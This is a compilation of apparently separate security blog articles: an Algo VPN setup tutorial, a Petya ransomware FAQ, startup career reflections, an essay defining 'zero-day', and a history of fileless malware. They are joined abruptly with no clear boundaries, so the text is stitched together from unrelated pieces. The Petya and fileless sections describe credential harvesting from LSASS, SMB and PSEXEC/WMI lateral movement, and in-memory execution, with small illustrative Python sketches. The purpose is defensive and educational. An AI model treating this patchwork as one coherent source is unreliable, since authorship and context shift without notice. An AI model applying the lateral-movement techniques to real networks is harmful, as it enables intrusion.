How to Deploy Your Own Algo VPN Server in the DigitalOcean Cloud

When analyzing malware or performing other security research, it’s often useful to tunnel connections through a VPN in a public cloud. This approach helps conceal the analyst’s origin, contributing to OPSEC when interacting with malicious infrastructure. Moreover, by using VPN exit nodes in different cities and even countries, the researcher can explore the target from multiple geographic vantage points, which sometimes yields additional findings.

One way to accomplish this is to set up your own VPN server in a public cloud, as an alternative to relying on a commercial VPN service. The following tutorial explains how to deploy the Algo VPN software bundle on DigitalOcean (the link includes my referral code). I like using DigitalOcean for this purpose because it offers low-end virtual private server instances for as little as $5 per month; also, I find it easier to use than AWS.

Algo VPN Overview

Algo is an open source software bundle for self-hosted IPSec VPN services. It was designed by the folks at Trail of Bits to be easy to deploy, to rely only on modern protocols and ciphers, and to provide reasonable security defaults. It also doesn’t require dedicated VPN client software for connecting from most systems and devices, thanks to native IPSec support.

To understand why its creators believe Algo is a better alternative to commercial VPNs, the Streisand VPN bundle and OpenVPN, read the blog post that announced Algo’s initial release.  As outlined in the post, Algo is meant “to be easy to set up. That way, you start it when you need it, and tear it down before anyone can figure out the service you’re routing your traffic through.”

Creating a DigitalOcean Virtual Private Server

To obtain an Internet-accessible system where you’ll install Algo VPN server software, you can create a “droplet” on DigitalOcean running Ubuntu 16.04 with a few clicks.

Accepting default options for the droplet should be OK in most cases. If you’re not planning to tunnel a lot of traffic through the system, selecting the least expensive size will probably suffice. Select the geographic region where the Virtual Private Server will run based on your requirements. Assign a hostname that appeals to you.

Once the new host is active, make a note of the public IP address that DigitalOcean assigns to it and log into it using SSH. Then run the following commands inside the new virtual private server to update its OS and install the Algo VPN core prerequisites:

apt-add-repository -y ppa:ansible/ansible
apt-get update -y
apt-get upgrade -y
apt-get install -y software-properties-common python-virtualenv ansible

At this point you could harden the configuration of the virtual private server, but these steps are outside the scope of this guide.

Installing Algo VPN Server Software

Next, obtain the latest Algo VPN server software on the newly created droplet and prepare for the installation by executing the following commands:

git clone https://github.com/trailofbits/algo
cd algo
python -m virtualenv env
source env/bin/activate

Set up the usernames for the people who will be using the VPN. To accomplish this, use your favorite text editor, such as Nano or Vim, to edit the config.cfg file in the ~/algo directory:

vim config.cfg

Remove the lines that represent the default users “dan” and “jack” and add your own (e.g., “john”), so that the users section of the file looks like this:

users:
  - john

After saving the file and exiting the text editor, execute the following command in the ~/algo directory to install the Algo software:

./algo

When prompted by the installer, select option 5 to install “to existing Ubuntu 16.04 server”.

As you proceed through the installer’s prompts, accepting the default answers should be fine in most cases, with a few exceptions:

  • When asked about the public IP address of the server, enter the IP address assigned to the virtual private server by DigitalOcean when you created the droplet.
  • If planning to VPN from Windows 10 or Linux desktop client systems, answer “Y” to the corresponding question.

After providing the answers, give the installer a few minutes to complete its tasks. (Be patient.) Once it finishes, you’ll see the “Congratulations!” message, stating that your Algo server is running. Make a note of the “p12 and SSH keys password for new users” that the message will display, in case you need to use it later.

Configuring VPN Clients

Once you’ve set up the Algo VPN service, follow the instructions on the Algo website to configure your VPN client. The steps differ for each OS. Fortunately, the Algo setup process generates files that allow you to accomplish this with relative ease. It stores the files under ~/algo/configs in a subdirectory whose name matches your server’s IP address.

For instance, to configure your iOS device, transfer your user’s Apple Profile file that has the .mobileconfig extension (e.g., john.mobileconfig) to the device, then open the file to install it. Once this is done, you can go to Settings > VPN on your iOS device to enable the VPN when you wish to use it. If at some point you wish to delete this VPN profile, go to General > Profile.

If setting up the VPN client on Windows 10, retrieve from the Algo server your user’s file with the .ps1 extension (e.g., windows_john.ps1) and the file with the .p12 extension (e.g., john.p12). Then, open an Administrator shell on the Windows system and execute the following command from the folder where you’ve placed these files, adjusting the file name to match your username:

powershell -ExecutionPolicy ByPass -File windows_john.ps1 Add

This will import the appropriate certificate information and create the VPN connection entry. To connect to the VPN server, go to Settings > Network & Internet > VPN. If you wish to remove the VPN entry, use the PowerShell command above, replacing “Add” with “Remove”.

Additional Considerations for Algo VPN

Before relying on the VPN to safeguard your interactions with malicious infrastructure, be sure to confirm that it’s concealing the necessary aspects of your origin. If it’s working properly, the remote host should see the IP address of your VPN server instead of the IP address of your VPN client. Similarly, your DNS traffic should be directed through the VPN tunnel, concealing your client’s locally-configured DNS server. One way to validate this is to use a DNS leak-testing website, comparing what information the site reveals before and after you activate your VPN connection. Also, confirm that you’re not leaking your origin over IPv6; one way to do that is by connecting to a site that reports your IPv6 address.
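
As a complementary local check, the sketch below (plain Python; the probe address serves only as a route-lookup target, no packets are actually sent) reports which source IP your operating system would use for Internet-bound traffic. With the Algo tunnel active, this should be the tunnel interface’s address rather than the address of your physical network interface:

```python
import socket

def outbound_ip(probe_host="8.8.8.8", probe_port=53):
    """Return the local source IP the OS would pick for traffic to probe_host.

    Connecting a UDP socket performs only a routing lookup -- no packets
    are sent. With the VPN tunnel up, the returned address should belong
    to the tunnel interface, not your LAN adapter.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.connect((probe_host, probe_port))
        return s.getsockname()[0]
    finally:
        s.close()
```

Run it once with the VPN down and once with it up; if the address doesn’t change, your traffic may not be entering the tunnel.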

You can turn off the virtual private server when you don’t need it. When you boot it up again, the Algo VPN software will automatically launch in the background. If running the server for longer periods of time, you should implement the security measures appropriate for Internet-connected infrastructure.

As you use your Algo VPN server, adversaries might begin tracking the server’s IP address and eventually blacklist it. Therefore, it’s a good idea to periodically destroy this DigitalOcean droplet and create a new one from scratch. This will not only change the server’s IP address, but also ensure that you’re running the latest version of VPN software and its dependencies. Unfortunately, after you do this, you’ll need to reimport VPN client profiles to match the new server’s IP address and certificate details.


Revision history:

  • 29th of June, 2017 18:00 (UTC +2) – Update 2 (current) – Added Q11
  • 28th of June, 2017 22:00 (UTC +2) – Update 1 – Initial FAQ

Q1 Is the Petya attack still in progress?
A: The initial attack vector appears to have been the accounting software M.E.Doc, for which a malicious software update was pushed and executed by clients in an automated fashion. Multiple organisations confirmed that this was their initial infection vector. After the initial infection, Petya can utilize different kinds of spreading mechanisms:

Using the EternalBlue and EternalRomance exploits, both NSA exploits published on the 14th of April 2017 by the Shadow Brokers. These exploits can be used to gain unauthorized access to remote Windows systems and execute malicious software with administrative privileges. In addition, Petya spreads using a variety of methods, both legitimate and illegitimate. The malware follows these four steps to spread itself:

  1. Tries to find credentials:
    • Method 1: Uses a custom tool to extract credentials from memory (it shares code with Mimikatz and accesses the Windows LSASS process)
    • Method 2: Steals credentials from the credential store on the infected systems
  2. Makes an inventory of the local network for other machines. If found, it checks whether port 139 or 445 is open
  3. Checks via WebDAV whether the enumerated systems have already been infected. If this is not the case, it will transfer the malware to the other systems via SMB;
  4. Utilizes PSEXEC or WMI tools, to remotely execute the malware.
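
To make the flow concrete, the four steps above can be sketched as the following loop (an illustrative Python sketch, not actual malware code; each capability is injected as a callable, and all names are mine):

```python
def spread(harvest_credentials, enumerate_hosts, smb_open,
           already_infected, copy_and_execute):
    """Illustrative model of the lateral-movement flow described above.

    Each capability is passed in as a callable, so only the decision
    logic is modeled: harvest credentials (step 1), enumerate reachable
    hosts (step 2), skip hosts without SMB or already infected (steps
    2-3), then copy the payload and execute it remotely (steps 3-4).
    """
    creds = harvest_credentials()            # step 1
    newly_infected = []
    for host in enumerate_hosts():           # step 2
        if not smb_open(host):               # port 139/445 check
            continue
        if already_infected(host):           # step 3: WebDAV check
            continue
        copy_and_execute(host, creds)        # steps 3-4: SMB copy + PSEXEC/WMI
        newly_infected.append(host)
    return newly_infected
```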

Please note that the initial infection vectors, the M.E.Doc update (and a related watering hole attack on a Ukrainian website), have been cleaned up. However, Petya can still spread for a limited amount of time to the following networks, based on the functionality outlined above:

  1. The local network (reserved IP spaces);
  2. To remote networks of third parties that are directly connected with the networks that contain systems that are already infected with Petya.

Q2 Which attack vectors are used to enter internal networks of organizations?
A At the moment, the only initial infection vector observed in the wild is the infected update from M.E.Doc. After initial entry into an affected organization’s internal network has been obtained, different spreading methods are used to infect further systems. These methods include the NSA exploits EternalBlue and EternalRomance, in combination with harvesting and reusing passwords to perform remote command execution (with PSEXEC and WMI) on other systems.

Q3 Are only companies that use M.E.Doc affected?
A No, the attack initially targeted organizations that were using M.E.Doc, but the worm also spread to other (connected) organizations that were not related to M.E.Doc.

Q4 How is it possible that I became infected with Petya, while being fully up to date and having all patches installed?
A: The Microsoft patch MS17-010 protects Windows systems against direct infection by the EternalBlue and EternalRomance NSA exploits. However, Petya includes additional methods to spread to Windows systems.

Most notably, the Petya malware can extract local Administrator and domain credentials from systems that are initially infected (for example because these systems were not patched). Subsequently, the malware can leverage these administrative credentials in combination with legitimate Microsoft tools and protocols (PSEXEC and WMI) to infect fully patched Windows systems.

Q5 How can I check if my organization is at risk for the Petya attack?
A Checking whether you are at risk for this attack involves multiple actions, because the attack uses several different methods to propagate within networks. The following actions can be performed to identify potentially vulnerable machines within the network:

  • Perform a network portscan to identify systems on which the TCP ports 139 and 445 are open. The more machines that are accessible on these ports, the greater the risk of the attack spreading to large numbers of systems within the network.
  • Perform a vulnerability scan to identify machines which are missing the MS17-010 (and the KB2871997) patch. If the patches are missing, the identified systems are vulnerable to one of the spreading and infection methods used by the malware.
  • Take an inventory of administrative credentials to identify whether passwords are shared between multiple machines. If so, the systems which can be accessed using these administrative credentials are vulnerable to one of the spreading and infection methods used by the malware.
    • The most important accounts to focus on during this inventory are accounts with elevated privileges, such as local Administrator accounts and domain accounts with local administrator privileges.
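
As an illustration of the first bullet, a minimal TCP reachability check for ports 139 and 445 might look like this (a plain-Python sketch; a real assessment would use a dedicated scanner such as nmap):

```python
import socket

SMB_PORTS = (139, 445)

def smb_ports_open(host, ports=SMB_PORTS, timeout=1.0):
    """Return the subset of ports on host that accept TCP connections."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:  # 0 means the connect succeeded
                open_ports.append(port)
    return open_ports

# Example: hosts reporting any open SMB port are candidates for the
# EternalBlue/EternalRomance and SMB-copy spreading methods.
# risky = {h: smb_ports_open(h) for h in ("10.0.0.5", "10.0.0.6")}
```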

It is important to consider that the infection, privilege escalation and lateral movement techniques used by the Petya malware are also frequently used during penetration testing on internal networks. It is therefore advised to review previous reports that followed internal penetration tests to get a quick overview of relevant vulnerabilities and to ensure that penetration tests on the internal networks are performed periodically.

Q6 We have infected machines; what can we do to recover them? Should we pay the ransom?
A The email address that the attackers used to receive payments and release decryption keys has been blocked by the email provider. This makes it impossible for the actor(s) behind the Petya malware to confirm payments and return decryption keys to victims. It is therefore not recommended to pay the ransom of $300 (or the equivalent in Bitcoin) requested by the malware.

Please note that after a system is infected, the malware attempts to spread before it is rebooted and the encryption process is started. Consequently, if a system is infected with Petya, but has not yet been rebooted or the fake CHKDSK process has not been completed, it may still prove possible to (partially) recover data from the infected system.

Q7 Do you know anything about the target of the Petya attack or the actors behind it?
A One of the few confirmed facts is that the initial infections occurred via an infected update from the Ukraine-based company M.E.Doc. This company’s software is used broadly, and almost exclusively, by organizations in Ukraine, which were thus the initial targets of the Petya attack.

This fact, combined with some of the characteristics of the attack, has led to extensive speculation in regard to the actors behind the attack (of which the grugq provides an extensive overview). However, at the moment there is no definitive public evidence to attribute the attack to a specific actor. The purpose of the attack and the actors behind it are still being actively investigated by Fox-IT and many others.

Q8 How does the Petya attack differ from the WannaCry/WannaCrypt attack?
A This Petya attack seems to be more targeted than WannaCry. While WannaCry included functionality to scan for vulnerable systems on the Internet, the Petya attack primarily targets other systems within the reserved IP spaces of affected networks.
One of the few similarities between Petya and WannaCry is their use of the SMB exploit EternalBlue, which was originally developed by the NSA and subsequently leaked by the Shadow Brokers. This is the only spreading vector of Petya that can be stopped by installing the MS17-010 patch. The other spreading vectors cannot be fully mitigated by patching, although installing the KB2871997 patch can reduce their impact.

In addition to EternalBlue, Petya includes further methods for spreading using lateral movement techniques such as credential re-use, PSEXEC and WMI. These techniques, which are often used in manual attacks by advanced attackers as well as during penetration tests on internal networks, have now been adapted and incorporated into an automated attack by the attackers in the Petya malware.

In regard to file encryption, Petya and WannaCry differ in how the system is rendered inoperable. Petya, in addition to encrypting individual files, also encrypts critical operating system components, thereby rendering the system inoperable after a reboot. The file encryption itself differs both in the way the files are encrypted and in the file types that are targeted.

Q9 I have heard rumors about an antidote or kill switch; is this true?
A Petya does not have a remote killswitch of the kind that was present in WannaCry. That is, there is no universal way to stop all Petya infections from occurring. A more limited, local way to prevent the Petya malware from spreading does exist, which is also referred to as a “killswitch” or an “antidote”.

This local antidote involves placing a file called “perfc” or “perfc.dat” in the C:\Windows directory. This works because Petya checks whether that file exists before infecting a vulnerable system; if the file exists, Petya won’t infect the system. Please note that Petya actually checks for a file with the same name as the file it was started from. So if the Petya file is renamed to “example.dll”, subsequent variants of that strain will check whether “C:\Windows\example” exists instead of “C:\Windows\perfc”. It just so happens that “perfc” is the filename of the main variant that’s currently spreading.
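
Applying the local antidote amounts to creating empty, read-only flag files. The sketch below (an illustrative Python helper; the directory is parameterized so it can be exercised safely outside C:\Windows) does just that:

```python
import os
import stat

def apply_petya_antidote(windows_dir=r"C:\Windows", names=("perfc", "perfc.dat")):
    """Create empty, read-only flag files that the currently spreading
    Petya variant checks for before infecting a system.

    Returns the list of paths that were newly created; existing files
    are left untouched, so the function is safe to run repeatedly.
    """
    created = []
    for name in names:
        path = os.path.join(windows_dir, name)
        if not os.path.exists(path):
            open(path, "w").close()        # an empty file is sufficient
            os.chmod(path, stat.S_IREAD)   # mark it read-only
            created.append(path)
    return created
```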

Q10 Are the patches for WannaCry and Petya automatically installed by Windows Update?
A On supported operating systems the patch can be installed through the Windows Update mechanism. If Windows Update has been configured to update automatically, these systems should have received MS17-010 several months ago. However, this is not the case on unsupported operating systems such as Windows XP, Windows Server 2003 and Windows 8. Microsoft has released patches for these operating systems that need to be downloaded and applied manually.

Q11 Will Petya encrypt network drives as well?
A In its regular file-encryption phase, Petya tries to encrypt files on every disk drive available to the victim machine. Notably, it only encrypts local drives, not network drives that are mounted as drive letters. It does this by checking the drive type and encrypting only drives of the fixed-media type, for example a hard disk drive or flash drive.

What’s It Like to Join a Startup’s Executive Team?

Startups are the innovation engine of the high-tech industry. Those who’ve participated in them have experienced the thrill and at times the disappointment of navigating uncharted territories of new ideas. Others have benefited from the fruits of these risk-takers’ labor by using the products they created.

What’s it like to contribute at an early stage of a startup? Below are my reflections on the first few months I’ve spent at Minerva so far. I joined this young endpoint security company as VP of Products not too long ago (and I’m loving it). I’ve outlined some takeaways in a generalized form that might benefit others in a similar position or those who are curious about entrepreneurial environments.

Situational Awareness: Where Am I?

When you come into a company—large or small—you already have some idea of the type of organization you’re joining. Your understanding is incomplete at best. After all, it is based on your perspective as an outsider, and is informed mainly by the company’s official external communications (website, brochures, job postings) and the interactions you’ve had during the interviewing process.

Of course, you’ll learn as much as you can about the firm before deciding to come on board; validate all your assumptions and fill in the gaps in your understanding after starting the job:

  • If the company is small, this quite literally means taking the time to speak with as many of your new colleagues as possible, not only to start getting to know them, but also to understand their perspective on the company’s successes and challenges. Who are these individuals, what do they do, and how might you be of help?
  • Similarly, talk to the board members: What are they most excited about? What are their biggest concerns? What do they expect of you? In what ways might they be able to help you in meeting those objectives, on the basis of their expertise and connections? How involved do they want to be in the company’s operations and your activities?
  • In addition, understand the mindset of the company’s customers and partners. What do they appreciate the most about the firm? Where do they see opportunities for improvements? How do they collaborate with the company today? How might you assist them in the short and long term? Where might they help you?

At this initial stage of your involvement with the company, you still have the benefit of easily asking questions that might later sound silly. At the moment, it’s also easier to let yourself say “I don’t know, but I’ll find out” when you face a question you cannot answer. You’re gaining situational awareness, starting to understand your tools and priorities, getting to know the people, and adjusting the mental model you built while you were still an outsider to the firm.

I had the benefit of participating in Minerva’s Advisory Board prior to becoming an employee. This allowed me to get to know some of my future colleagues and confirm that we’d get along, as well as to make sure that we were aligned on the company’s direction. Still, only after spending several weeks immersed in the company’s day-to-day activities did I truly begin to feel like I knew where I was and what I was doing there.

Takeaways: It takes longer than you might expect to feel fully engaged and productive with the new team. Do your research beforehand, but accept that you can only see a sliver of the actual company. Interact with others as much as possible, but leave time for reflection.

Self-Discovery: Who Are We?

If you’re joining a startup’s executive team, there’s a good chance that it’s entering a new phase of its life cycle. In the case of Minerva, I came on board as the company was preparing to enter the US market. It was starting to build a sales force and formalize its go-to-market strategy. The firm had been in existence for three years by that time, which had allowed it to build the underlying framework and several product components. It had gained feedback from early customers, assembled the R&D team and was ready to make itself known to the world.

After establishing an executive team, the startup will likely be looking to learn from its experiences so far and determine the direction for the next stage of its development. Since you’re new to the effort, you’ll need to begin by learning about your colleagues’ impressions and ideas before voicing your own. However, don’t wait too long before sharing your opinions. For the next few weeks you still have the fresh perspective that allows you to empathize with outsiders—customers, analysts, partners, investors—in a way that’s very difficult to do once you’ve formally integrated into the collective.

Lots of frameworks exist for helping you and other members of the executive team determine the business strategy. You can start with SWOT analysis, which, as Wikipedia summarizes, encourages you to understand the following aspects of your firm:

  • “Strengths: characteristics of the business … that give it an advantage over others
  • Weaknesses: characteristics of the business that place [it] at a disadvantage relative to others
  • Opportunities: elements in the environment that the business … could exploit to its advantage
  • Threats: elements in the environment that could cause trouble for the business”

If, like me, you are focused on product management, you might benefit from my Product Management Framework for Creating Security Products, which recommends asking and answering questions such as the ones below.

It will likely take many brainstorming sessions, informal conversations, emails and adviser interactions to understand and verbalize the way in which your solution relates to other products in your ecosystem. What problems are you solving and, most importantly, what are you not trying to tackle? What’s your competition? Why should customers care about you? What will industry analysts think? Once you’ve figured this out, know that you’ll need to adjust as the company and the market evolve.

As with any self-reflective experience, determining who you are and how you hope to be perceived by others is both challenging and exhilarating. Engaging in this exercise forces you to ask tough questions about yourself. You also need to tap into your inner optimist to envision a future in which you’ll succeed despite, or perhaps because of, the challenging road ahead.

In the case of Minerva, the company developed a unique way of combating evasive malware. However, having a strong technological base alone is insufficient: we needed to determine how to explain not only what we do, but why customers would benefit from the solution in a way that they cannot with the existing security layers. How are we related to baseline anti-malware tools? What about the “next-gen” players? (For more on this, see my Questions for Endpoint Security Startups post.)

Takeaways: Harness the external perspective you have after just joining the firm to introduce new ideas and challenge the old ones. Recognize that marketing and management frameworks are just suggestions for how to devise a business strategy. Be realistic about market dynamics and possibilities, but remember the need to stay optimistic when embarking upon new ventures.

External Communication

Once you understand where you are and who your company is, you’re ready to explain this to others. That means making your presence known in your target markets as you begin to fill the sales pipeline and close deals, and as you continue to develop your product. You’re not only interacting with prospective customers directly, but also working with industry analysts and other influencers, educating them about your existence and value proposition, and soliciting feedback on the vision for your product.

Your company probably has a budding sales force, which you need to equip with the tools they’ll use when explaining the value of your solution. Depending on your specific role, you might be tasked with creating, contributing to, or providing feedback on internal documentation that summarizes the results of the earlier self-discovery process, keeping everyone in the company informed and marching to the same beat. Ditto for external-facing collateral, such as the company’s website contents, brochures, whitepapers, etc. Many of the documents the company developed in its earlier stages might need to be revised, retired or expanded.

External communications are about persuasion: you need to convince others to pay attention to your ideas and solutions, which often entails changing their perspective and challenging their assumptions.

You’re passionate about the benefits of your technology; yet, organizations are cautious of newcomers. Moreover, the market is dominated by the rhetoric of the incumbents, which requires the new entrants to clearly articulate how they fit into the existing marketplace and educate prospects about seeing through the marketing hype. To be heard, a young company must engage in persuasive communications as it builds up its core customer base and establishes a reputation. As a member of the executive team, it’s up to you to make this happen.

As I write this, Minerva just announced the closing of a Series A funding round. Encouraged by the enthusiasm of early adopters and the feedback from prospects, we established a sales team, formalized product roadmap plans, and updated the company’s marketing collateral. A lot of my time is spent speaking with prospects, customers, analysts, partners and, of course, colleagues, in addition to continuing to enhance the product.

Takeaways: Understanding your product’s value and your company’s strategy is only part of the battle. Persuading others to support you in this endeavor requires lots of external communications (see How to Be Heard in IT Security and Business). Be ready to spend lots of time writing papers, creating and editing slide decks, drafting and answering emails, speaking on the phone and meeting with people one-on-one and at industry events. And continue to deliver upon product roadmap commitments.

Disambiguate “Zero-Day” Before Considering Countermeasures

“Zero-day” is the all-powerful boogieman of the information security industry. Too many of us invoke it when discussing scary threats against which we feel powerless. We need to define and disambiguate this term before attempting to determine whether we’ve accounted for the associated threats when designing security programs.

Avoid Zero-Day Confusion

I’ve seen “zero-day” used to describe two related, but independent concepts. First, we worry about zero-day vulnerabilities—along with the associated zero-day exploits—for which we have no patch. Also, we’re concerned about zero-day malware, which we have no way of detecting.

These scenarios can represent different threats that often require distinct countermeasures. Let’s try to avoid confusion and FUD by being clear about the type of issue we are describing. To do this, in short:

Use “zero-day” as an adjective. Don’t use it as a noun.

This way you’ll be more likely to clarify what type of threat you have in mind.

The term zero-day (sometimes written as “0day”) appears to originate from the software pirating scene, as @4Dgifts pointed out to me on Twitter. It referred to cracked software (warez) distributed on or before its official release date; this is outlined on Wikipedia. By the way, if you like leetspeak, writing “0day” is fine when addressing technologists; stick to “zero-day” if your audience includes executives or business people.

Zero-Day Vulnerabilities and Exploits

Let’s start with zero-day vulnerabilities. I came across the following reasonable definition of this term in FireEye’s Zero-Day Danger report, which is consistent with how many other security vendors use this term:

“Zero-day vulnerabilities are software flaws that leave users exposed to cyber attacks before a patch or workaround is available.”

Along these lines, a zero-day exploit is one that targets a zero-day vulnerability.

An alternative definition of a zero-day exploit, which was captured by Pete Lindstrom, is “an exploit against a vulnerability that is not widely known.” (Thanks for pointing me to that source, Ryan Naraine.)

Zero-Day Malicious Software

I’ve encountered numerous articles that ask “What is zero-day malware?” and then confuse the matter by proceeding to discuss zero-day exploits instead. Even FireEye’s report on zero-day vulnerabilities, mentioned above, blurred the topic by briefly slipping into the discussion of zero-day malware when it mentioned that “code morphing and obfuscation techniques generate new malware variants faster than traditional security firms can generate new signatures.”

To avoid ambiguity or confusion, I prefer to use the term zero-day malware like this:

Zero-day malware is malicious software for which there is no currently-known detection pattern.

The word “pattern” includes the various ways in which one might recognize a malicious program, be it a traditional signature, a machine learning model, or behavioral footprints. I think this definition is consistent with the type of malware that Carl Gottlieb had in mind during our discussion on Twitter: malware variants that don’t match a known identifier, such as a hash.
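
To make the idea of a detection pattern concrete, consider the weakest kind: a hash signature. A specimen whose digest is absent from the known-bad set is “zero-day” with respect to that signature database, even if it’s a trivially re-packed variant of known malware. (A toy sketch; the sample bytes and hash set below are made up for illustration.)

```python
import hashlib

def is_zero_day(sample_bytes, known_bad_sha256):
    """Return True if the sample matches no known hash signature.

    This illustrates why trivial code morphing defeats hash-based
    detection: changing a single byte yields a brand-new digest.
    """
    digest = hashlib.sha256(sample_bytes).hexdigest()
    return digest not in known_bad_sha256

# A hypothetical signature database containing one known specimen.
known = {hashlib.sha256(b"EVIL-PAYLOAD-V1").hexdigest()}
```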

Zero-Day Attacks

Another “zero-day” term that security professionals sometimes use in this context is zero-day attack. Such an assault is reasonably defined by Leyla Bilge and Tudor Dumitras in their Before We Knew It paper:

“A zero-day attack is a cyber attack exploiting a vulnerability that has not been disclosed publicly.”

However, what if the attack didn’t involve zero-day vulnerabilities, but instead employed zero-day malware? We’d probably also call such an incident a zero-day attack. Ambiguity alert!

Unless you need to be general, consider staying away from “zero-day attack” and clarify which zero-day concept you’re discussing.

Avoid the Ambiguity, Save the World

Why worry about “zero-day” terminology? There is an increasingly-acute need for infosec designs that account for attacks that incorporate unknown, previously-unseen components. However, the way organizations handle zero-day exploits will likely differ from how they deal with zero-day malware.

By using “zero-day” as an adjective and clarifying which word it’s describing, you can help companies devise the right security architecture. In contrast, asking “What is zero-day?” is too ambiguous to be useful.

As I mentioned when discussing fileless malware, I am especially careful with terms that risk turning into industry buzzwords. My endpoint security product at Minerva focuses on blocking unknown malware that’s designed to evade existing defenses, and I want to avoid misrepresenting our capabilities when using the term zero-day. Perhaps this write-up will help my company and other security vendors better explain how we add value to the security ecosystem.

The History of Fileless Malware – Looking Beyond the Buzzword

What’s the deal with “fileless malware”? Though many security professionals cringe when they hear this term, lots of articles and product brochures mention fileless malware in the context of threats that are difficult to resist and investigate. Below is my attempt to look beyond the buzzword, tracing the origins of this term and outlining the malware samples that influenced how we use it today.

Frenzy for Fileless

The notion of fileless malware has been gaining a lot of attention at industry events, private meetings and online discussions. This might be because this threat highlights some of the deficiencies in old-school endpoint security methods and gives new approaches an opportunity to highlight their strengths.

Indeed, according to Google Trends, people’s interest in this term blipped in 2012 and 2014, began building up toward 2015 and spiked in 2017.

This pattern corresponds to the publicly-discussed malware that exhibited “fileless” capabilities in the recent years, and with the burst of research and marketing publications that appeared in 2017.

What is Fileless Malware?

Let’s get this out of the way: Fileless malware sometimes has files. Most people today seem to be using the term fileless malware in a manner consistent with the following definition:

Fileless malware is malware that operates without placing malicious executables on the file system.

This definition accommodates situations where the infection began with a malicious script or even a benign executable on the file system. It also matches the scenarios where the specimen stored artifacts in the registry, even though Windows keeps registry contents on disk. It applies regardless of the way in which the infection occurred, be it an exploit of a vulnerability, a social engineering trick, or a misuse of some feature.

Though initially fileless malware referred to malicious code that remained solely in memory without even implementing a persistence mechanism, the term evolved to encompass malware that relies on some aspects of the file system for activation or presence. Let’s review some of the malicious programs that influenced how we use this term today.
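
One practical heuristic that follows from this definition is to look for running processes whose backing executable no longer exists on disk. The sketch below assumes a Linux-style /proc filesystem (a rough illustration only; on Windows, inspecting process memory would be needed instead):

```python
import os

def processes_without_backing_file(proc_root="/proc"):
    """Return (pid, exe_path) pairs for processes whose executable has
    been deleted from disk -- a rough memory-resident-code heuristic."""
    suspicious = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue  # not a process directory
        try:
            exe = os.readlink(os.path.join(proc_root, entry, "exe"))
        except OSError:
            continue  # kernel thread, permission denied, or process exited
        if exe.endswith(" (deleted)"):
            suspicious.append((int(entry), exe))
    return suspicious
```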

2001-2003: Code Red and SQL Slammer

The notion of malicious code that resides solely in memory certainly existed prior to the 21st century. Yet, it wasn’t until the highly prolific Code Red worm left its mark on the Internet in 2001 that the term fileless malware entered general parlance. The earliest public reference I could find dates to summer 2001, when Kaspersky Labs published an announcement that quoted none other than Eugene Kaspersky:

“We predict that in the very near future, such ‘fileless’ worms as Code Red will become one of the most widespread forms of malicious programs, and an anti-virus’ ineffectiveness in the face of such a threat simply invites danger.”

Code Red exploited a vulnerability in Microsoft IIS web servers, remaining solely in memory of the infected host, as explained by the Center for Applied Internet Data Analysis.

A year and a half later another worm—SQL Slammer—spread like wildfire by exploiting a vulnerability in Microsoft SQL servers. Robert Vamosi, writing for ZDNet in 2003, described this malware as “file-less” and mentioned that it resided “only in memory, much as Code Red.”

I came across another early mention of this term in a 2003 patent filing by the venerable Peter Szor, who worked at Symantec at the time. Titled “Signature Extraction System and Method,” the patent defines fileless malware as:

“Malicious code that is not file based but exists in memory only… More particularly, fileless malicious code … appends itself to an active process in memory…”

The original definition of fileless malware was thus close to the plain English meaning of the words: malware that remains active without leaving any files behind.

2012: A Bot That Installed the Lurk Trojan

The next fileless malware reference I could locate appeared nearly a decade after the Code Red and SQL Slammer worms. In 2012, Sergey Golovanov at Kaspersky Labs presented his analysis of a bot that didn’t save any files to the hard drive, explaining that:

“We are dealing with a very rare kind of malware — the so-called fileless malicious programs that do not exist as files on the hard drive but operate only in the infected computers RAM.”

The unnamed specimen exploited a client-side Java vulnerability and operated solely in memory of the affected javaw.exe process. Sergey mentioned that the bot was capable of installing the Lurk banker trojan.

Earlier that year, Amit Malik at SecurityXploded published an educational write-up, explaining how to achieve “in-memory or file-less execution” of a Windows program without saving it to disk after downloading it from the Internet.
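
Amit Malik’s write-up targets Windows PE files; as a rough, benign analogy (not his method), the core idea of running code that exists only as bytes in memory, without ever writing it to disk, can be sketched in Python:

```python
# Benign analogy of "in-memory execution": code arrives as bytes
# (e.g., downloaded over the network) and is compiled and run
# without ever touching the file system.
payload = b"result = sum(range(10))"  # stands in for downloaded code

namespace = {}
code_obj = compile(payload.decode(), "<memory>", "exec")  # no file involved
exec(code_obj, namespace)

print(namespace["result"])  # 45
```

The same principle, applied to native executables mapped directly into a process’s address space, is what allows such malware to avoid leaving traditional file system artifacts.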

2014: Poweliks, Angler, Phase Bot

The malicious programs outlined above stayed purely memory-resident without leaving any direct footprints on the file system. As a result of this volatility, they disappeared once the system was rebooted. In contrast, 2014 brought us the Poweliks malware, which G Data described as “persistent malware without a file.” This specimen found its way onto the system by exploiting a Microsoft Word vulnerability. It used PowerShell and JavaScript along with shellcode to jumpstart its in-memory execution. Kevin Gossett at Symantec described its persistence mechanism like this:

“Normally, malware will place an entry in the Run subkey that points to a malicious executable which is then executed. Poweliks makes the Run subkey call rundll32.exe, a legitimate Windows executable used to load DLLs, and passes in several parameters. These parameters include JavaScript code that eventually results in Poweliks being loaded into memory and executed”
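
This registry-based launcher pattern lends itself to a simple detection heuristic: flag autorun entries that invoke rundll32.exe with script-like arguments. The sketch below is my own illustration, not Symantec’s detection logic, and the sample value strings are invented:

```python
# Heuristic sketch: flag autorun values that launch rundll32.exe with
# JavaScript-style parameters, the pattern described for Poweliks.
def looks_like_poweliks_style(run_value: str) -> bool:
    """Return True if an autorun value resembles the Poweliks launcher."""
    v = run_value.lower()
    return "rundll32" in v and ("javascript:" in v or "mshtml" in v)

# Illustrative autorun entries, not real registry data.
entries = [
    r"C:\Program Files\Vendor\updater.exe /quiet",
    r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval(...)',
]
flagged = [e for e in entries if looks_like_poweliks_style(e)]
print(len(flagged))  # 1
```

A real scanner would read the Run subkeys via the Windows registry API; this sketch only shows the string-matching idea.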

A month later, security researcher Kafeine documented an Angler exploit kit infection that exhibited fileless characteristics. The attack targeted a client-side Java vulnerability and operated solely in memory of the affected javaw.exe process. In a related later development, Angler began installing the Bedep downloader in 2016 that, according to Palo Alto’s Brad Duncan, “is installed without creating any files because it is loaded directly into memory by the exploit shellcode.”

